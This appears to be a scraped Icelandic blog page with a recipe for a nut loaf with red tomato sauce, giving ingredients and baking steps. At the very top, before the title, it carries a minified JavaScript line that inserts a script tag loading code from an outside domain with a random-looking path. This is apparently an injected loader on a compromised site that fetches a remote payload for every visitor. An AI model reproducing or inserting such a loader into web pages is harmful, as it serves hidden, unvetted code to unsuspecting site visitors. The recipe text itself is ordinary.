;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Hnetuhleifur með rauðri sósu – Eydís — Ljósmyndun

Hnetuhleifur með rauðri sósu

Ég hef aldrei búið til hnetusteik áður en hef hins vegar búið til alls kyns grænmetisbuff og bollur.  Ég rakst á uppskrift í veislubók Nóatúns en aðlagaði hana örlítið. Ég fer ekki endilega út í búð til að kaupa akkúrat það sem er gefið upp í uppskriftum, reyni frekar að nýta það sem ég á til í skápunum.

 

300 gr hnetur
 (ég notaði blöndu af kasjúhnetur,möndlum,pistasíum og jafnvel 10 gr af sesamfræjum)
1 stór laukur fínsaxaður
1 rauð paprika fínsöxuð
1 askja sveppir fínsaxaðir
3 hvítlauksrif saxaðir
180 gr rifinn ostur
(gefið upp cheddar en ég notaði bara pizzaost 😉
40 gr parmesan
það væri auðvitað best að nota ferskan en ég notaði bara krukkuost í þetta skiptið
80 gr byggmjöl
eða heilhveiti
1 egg slegið
salt og pipar eftir smekk

_MG_3075.jpgSteikið lauk og sveppi á pönnu ásamt hvítlauknum í nokkrar mínútur þar til laukurinn verður glær, ekki brúna hann. Kælið. Smyrjið eldfast form sem er 14×21 sm og klæðið það með bökunarpappír. Setjið hneturnar í matvinnsluvél, malið þær en passið að þær verði ekk alveg að mauki. Blandið saman sveppablöndunni,hnetunum,ostinum, parmesan, eggi og byggmjöli í skál og hrærið vel saman.

 

 

 

 

_MG_3083.jpgKryddið með salti og pipar, setjið í formið og bakið við 180 gráður í 45-60 mínútur. Látið steikina standa í 5-10 mínútur áður en hún er borin fram. Lyftið steikinni með bökunarpappírnum og setjið á disk.

 

 

 

 

 

 

Tómatsósa
1 laukur fínsaxaður_MG_3088.jpg1-2 msk extra virgin ólífuolía
2 hvítlauksgeirar pressaðir
1 dós tómatar
1 msk tómatpúrra
1 tsk sykur
Steikið laukirnn og hvítlaukinn í olíunni í 3 mínútur eða þar til glær, bætið restinni út í og sjóðið í 5 mínútur.

 

Leave a Reply

Your email address will not be published. Required fields are marked *